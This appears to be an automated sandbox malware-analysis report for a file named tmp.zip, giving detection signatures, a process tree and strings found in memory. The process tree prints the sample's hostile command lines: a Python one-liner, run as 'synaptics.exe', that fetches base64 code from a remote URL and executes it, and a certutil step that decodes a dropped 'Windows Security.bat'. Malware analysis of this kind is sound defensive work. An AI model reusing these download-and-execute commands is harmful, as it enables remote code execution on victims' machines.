Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
tmp.zip

Overview

General Information

Sample name:tmp.zip
Analysis ID:1578816
MD5:7e403940832caa63822133c4b186c41b
SHA1:ded59a29c15debb3314e64700e3f9879b0a71006
SHA256:4ee7c71150e3871468e458402fc24e2bd48cb285b6782aff8f9b252abb5b0885
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: Legitimate Application Dropped Script
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64_ra
  • rundll32.exe (PID: 6628 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • cmd.exe (PID: 7088 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\tmp\New Text Document.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • synaptics.exe (PID: 6676 cmdline: "synaptics.exe" -c "import requests,base64; exec(base64.b64decode(requests.get('https://www.aviationchartersolutions.com/form/php-mailer/examples/styles/bin/Tuyen/Tuyen_ALL').text))" MD5: 8AD6C16026FF6C01453D5FA392C14CB4)
    • certutil.exe (PID: 6496 cmdline: certutil -f -decode "C:\Users\Public\Windows Security.~b64" "C:\Users\Public\Windows Security.bat" MD5: F17616EC0522FC5633151F7CAA278CAA)
  • notepad.exe (PID: 4064 cmdline: "C:\Windows\System32\NOTEPAD.EXE" C:\Users\user\Desktop\tmp\New Text Document.bat MD5: 27F71B12CB585541885A31BE22F61C83)
  • cmd.exe (PID: 1000 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Windows Security.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • notepad.exe (PID: 2424 cmdline: "C:\Windows\System32\NOTEPAD.EXE" C:\Users\Public\Windows Security.bat MD5: 27F71B12CB585541885A31BE22F61C83)
  • cmd.exe (PID: 2280 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Windows Security.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 2408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • OpenWith.exe (PID: 5920 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
    • notepad.exe (PID: 3724 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Windows Security MD5: 27F71B12CB585541885A31BE22F61C83)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: File createdAuthor: frack113, Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\certutil.exe, ProcessId: 6496, TargetFilename: C:\Users\Public\Windows Security.bat
Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\cmd.exe, ProcessId: 7088, TargetFilename: C:\Users\Public\M20EKMMEH2
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: synaptics.exe, 0000000C.00000002.1963387255.000000006C804000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_lzma.pdbOO source: synaptics.exe, 0000000C.00000002.1982535254.0000000073C2B000.00000002.00000001.01000000.00000012.sdmp
Source: Binary string: D:\a\1\b\bin\win32\pythonw.pdb source: synaptics.exe, 0000000C.00000000.1629744050.0000000000352000.00000002.00000001.01000000.00000004.sdmp, synaptics.exe, 0000000C.00000002.1930501818.0000000000352000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_bz2.pdb source: synaptics.exe, 0000000C.00000002.1983332147.0000000073D3C000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_ssl.pdb source: synaptics.exe, 0000000C.00000002.1984639741.0000000073D7C000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: d:\a01\_work\11\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: synaptics.exe, 0000000C.00000002.1985617108.00000000747F1000.00000020.00000001.01000000.00000006.sdmp
Source: Binary string: D:\a\1\b\libssl-1_1.pdbAA source: synaptics.exe, 0000000C.00000002.1966699557.000000006C922000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: D:\a\1\b\bin\win32\select.pdb source: synaptics.exe, 0000000C.00000002.1986111830.0000000074AC3000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: D:\a\1\b\bin\win32\pythonw.pdb source: synaptics.exe, 0000000C.00000000.1629744050.0000000000352000.00000002.00000001.01000000.00000004.sdmp, synaptics.exe, 0000000C.00000002.1930501818.0000000000352000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_hashlib.pdb source: synaptics.exe, 0000000C.00000002.1984069156.0000000073D65000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_lzma.pdb source: synaptics.exe, 0000000C.00000002.1982535254.0000000073C2B000.00000002.00000001.01000000.00000012.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_queue.pdb source: synaptics.exe, 0000000C.00000002.1983655374.0000000073D53000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: D:\a\1\b\bin\win32\unicodedata.pdb source: synaptics.exe, 0000000C.00000002.1956133927.000000006C67C000.00000002.00000001.01000000.00000015.sdmp
Source: Binary string: D:\a\1\b\bin\win32\python310.pdb source: synaptics.exe, 0000000C.00000002.1976070678.000000006CC74000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_socket.pdb source: synaptics.exe, 0000000C.00000002.1985302258.0000000073DE8000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 1.1.1t 7 Feb 2023built on: Thu Feb 9 15:27:35 2023 UTCplatform: VC-WIN32OPENSSLDIR: "C:\Program Files (x86)\Common Files\SSL"ENGINESDIR: "C:\Program Files (x86)\OpenSSL\lib\engines-1_1"not available source: synaptics.exe, 0000000C.00000002.1963387255.000000006C804000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: D:\a\1\b\libssl-1_1.pdb source: synaptics.exe, 0000000C.00000002.1966699557.000000006C922000.00000002.00000001.01000000.0000000B.sdmp
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: www.aviationchartersolutions.com
Source: synaptics.exe, 0000000C.00000003.1850523273.00000000015A2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1864400413.00000000028AF000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1871414464.00000000015A2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1847786019.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1875337094.00000000015A6000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1854894933.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000002.1951320544.0000000004470000.00000004.00001000.00020000.00000000.sdmp, utils.cpython-310.pyc.81676512.12.drString found in binary or memory: http://.../back.jpeg
Source: synaptics.exe, 0000000C.00000003.1719985129.00000000023B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/
Source: synaptics.exe, 0000000C.00000003.1678595218.0000000001577000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1678119957.00000000021A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue12029
Source: synaptics.exe, 0000000C.00000003.1678595218.0000000001577000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1678119957.00000000021A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue13585
Source: synaptics.exe, 0000000C.00000003.1740875328.0000000002323000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1743273383.000000000242E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue16298)
Source: synaptics.exe, 0000000C.00000003.1678595218.0000000001577000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1678119957.00000000021A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue19404
Source: synaptics.exe, 0000000C.00000003.1631609273.0000000001511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue19619
Source: synaptics.exe, 0000000C.00000003.1635087873.0000000002161000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue5845#msg198636
Source: synaptics.exe, 0000000C.00000003.1668650912.0000000001577000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1669343067.0000000002337000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1666349053.0000000002323000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue874900
Source: synaptics.exe, 0000000C.00000003.1654469459.0000000001539000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1651369872.0000000001578000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1651694816.0000000001537000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/259174/
Source: synaptics.exe, 0000000C.00000003.1914730730.0000000002430000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1860944335.000000000240E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1906041657.0000000002428000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1903142280.000000000241E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
Source: synaptics.exe, 0000000C.00000003.1738198080.0000000002370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577573-compare-algorithms-for-heapqsmallest
Source: synaptics.exe, 0000000C.00000003.1900287289.000000000239A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1905319819.00000000023A0000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1904325037.00000000023A0000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1863564990.000000000239A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
Source: synaptics.exe, 0000000C.00000003.1913139873.000000000223B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1911857606.0000000002238000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1898262065.000000000223D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1903554609.000000000223D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1914277908.000000000240A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: synaptics.exe, 0000000C.00000003.1900287289.000000000235A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1911418263.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1869330974.0000000002359000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl
Source: synaptics.exe, 0000000C.00000003.1869330974.0000000002359000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crlSBR
Source: synaptics.exe, 0000000C.00000003.1911418263.00000000014F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crlr
Source: synaptics.exe, 0000000C.00000003.1900287289.000000000239A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1905319819.00000000023A0000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1904325037.00000000023A0000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1863564990.000000000239A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
Source: synaptics.exe, 0000000C.00000003.1900287289.000000000239A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1863564990.000000000239A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crliX
Source: synaptics.exe, 0000000C.00000003.1919136548.000000000236D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1915578455.000000000236D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1926150995.0000000002369000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1869330974.0000000002369000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1900287289.000000000236D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1909083590.000000000236D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl
Source: synaptics.exe, 0000000C.00000003.1900287289.000000000235A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1869330974.0000000002359000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: synaptics.exe, 0000000C.00000003.1919136548.000000000236D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1915578455.000000000236D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1926150995.0000000002369000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1869330974.0000000002369000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1900287289.000000000236D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1909083590.000000000236D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crllsC
Source: synaptics.exe, 0000000C.00000003.1919136548.000000000236D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1915578455.000000000236D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1926150995.0000000002369000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1869330974.0000000002369000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1900287289.000000000236D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1909083590.000000000236D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl
Source: synaptics.exe, 0000000C.00000003.1900287289.000000000235A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1869330974.0000000002359000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: synaptics.exe, 0000000C.00000003.1919136548.000000000236D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1915578455.000000000236D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1926150995.0000000002369000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1869330974.0000000002369000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1900287289.000000000236D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1909083590.000000000236D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crlin
Source: synaptics.exe, 0000000C.00000003.1919136548.000000000236D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1915578455.000000000236D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1926150995.0000000002369000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1869330974.0000000002369000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1900287289.000000000236D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1909083590.000000000236D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
Source: synaptics.exe, 0000000C.00000003.1917439823.000000000223B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1913139873.000000000223B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1911857606.0000000002238000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1898262065.000000000223D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1903554609.000000000223D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000002.1938183809.000000000223D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: synaptics.exe, 0000000C.00000003.1801944128.0000000002245000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1802847834.00000000021A7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1832362104.00000000021A7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1800177746.0000000002322000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1823366760.0000000002A8B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000002.1950407050.0000000004430000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1802847834.0000000002170000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1793425461.0000000002937000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1801577022.0000000002322000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
Source: synaptics.exe, 0000000C.00000003.1689258541.0000000002170000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1688014912.0000000002369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://foo.com/
Source: synaptics.exe, 0000000C.00000003.1689258541.0000000002170000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1688014912.0000000002369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://foo.com:/
Source: synaptics.exe, 0000000C.00000003.1748081305.0000000002347000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1929905430.0000000002346000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1840441627.0000000002346000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1768625045.0000000002347000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1740875328.0000000002337000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1789550370.0000000002344000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1778927296.0000000002347000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1833740826.0000000002343000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1744500063.0000000002347000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1782473835.0000000002340000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1776163819.0000000002347000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1856937653.0000000002347000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1797512291.0000000002344000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1772647335.0000000002341000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1766171798.0000000002347000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1904592655.0000000002345000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1736346735.0000000002851000.00000004.00000020.00020000.00000000.sdmp, connectionpool.cpython-310.pyc.45586216.12.drString found in binary or memory: http://google.com/
Source: synaptics.exe, 0000000C.00000003.1824737948.00000000028B4000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1898262065.000000000220E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1822265352.0000000002233000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1802177462.0000000002208000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1913139873.0000000002231000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1915787418.00000000028B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1897273841.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1854894933.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1849776832.0000000002232000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1760885146.00000000028B4000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1739361059.00000000028B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
Source: synaptics.exe, synaptics.exe, 0000000C.00000003.1917550687.00000000021AD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1907412471.000000000219D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1857691039.00000000021AD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1832362104.00000000021AD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1742112244.00000000021AD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1910070573.0000000001546000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1775047243.00000000021AD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1867337464.00000000021A7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1790661140.00000000021AE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1762745178.000000000154D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000002.1932651699.0000000001549000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1736857629.000000000219F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1745673292.00000000021AD000.00000004.00000020.00020000.00000000.sdmp, timeout.cpython-310.pyc.45584536.12.drString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
Source: synaptics.exe, 0000000C.00000003.1668650912.0000000001577000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1666349053.0000000002323000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/j2se/1.5.0/docs/api/java/util/concurrent/
Source: synaptics.exe, 0000000C.00000003.1698496322.0000000001590000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1699391793.0000000001587000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mail.python.org/pipermail/python-bugs-list/2001-January/003752.html
Source: synaptics.exe, 0000000C.00000003.1916003967.0000000002870000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000002.1944341426.0000000002870000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1864400413.0000000002870000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1922407233.0000000002870000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es
Source: synaptics.exe, 0000000C.00000003.1902234640.000000000243A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es0
Source: synaptics.exe, 0000000C.00000003.1864400413.0000000002870000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.esABR
Source: synaptics.exe, 0000000C.00000003.1747587679.0000000001588000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1749727985.0000000002436000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pubs.opengroup.org/onlinepubs/009695399/basedefs/xbd_chap04.html#tag_04_11
Source: synaptics.exe, synaptics.exe, 0000000C.00000003.1917550687.00000000021AD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1907412471.000000000219D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1905859876.00000000028F4000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000002.1937468381.00000000021AD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1913624681.0000000002375000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1864400413.00000000028E6000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1927408676.00000000021AB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1867337464.00000000021A7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1902783271.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1869330974.0000000002373000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000002.1945344541.00000000028F4000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1897273841.00000000028E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/
Source: synaptics.exe, 0000000C.00000003.1905859876.00000000028F4000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1902783271.00000000028E7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000002.1945344541.00000000028F4000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1897273841.00000000028E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/AA_%
Source: synaptics.exe, 0000000C.00000003.1913624681.0000000002375000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1869330974.0000000002373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/U
Source: synaptics.exe, 0000000C.00000003.1917550687.00000000021AD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1907412471.000000000219D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000002.1937468381.00000000021AD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1927408676.00000000021AB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1867337464.00000000021A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/oD
Source: synaptics.exe, 0000000C.00000003.1917550687.00000000021AD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1907412471.000000000219D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000002.1937468381.00000000021AD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1927408676.00000000021AB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1867337464.00000000021A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/xD
Source: synaptics.exe, 0000000C.00000003.1668650912.0000000001577000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1666349053.0000000002323000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sourceware.org/pthreads-win32/manual/pthread_barrier_init.html
Source: synaptics.exe, 0000000C.00000003.1689258541.0000000002170000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1688014912.0000000002369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc5234#appendix-B.1
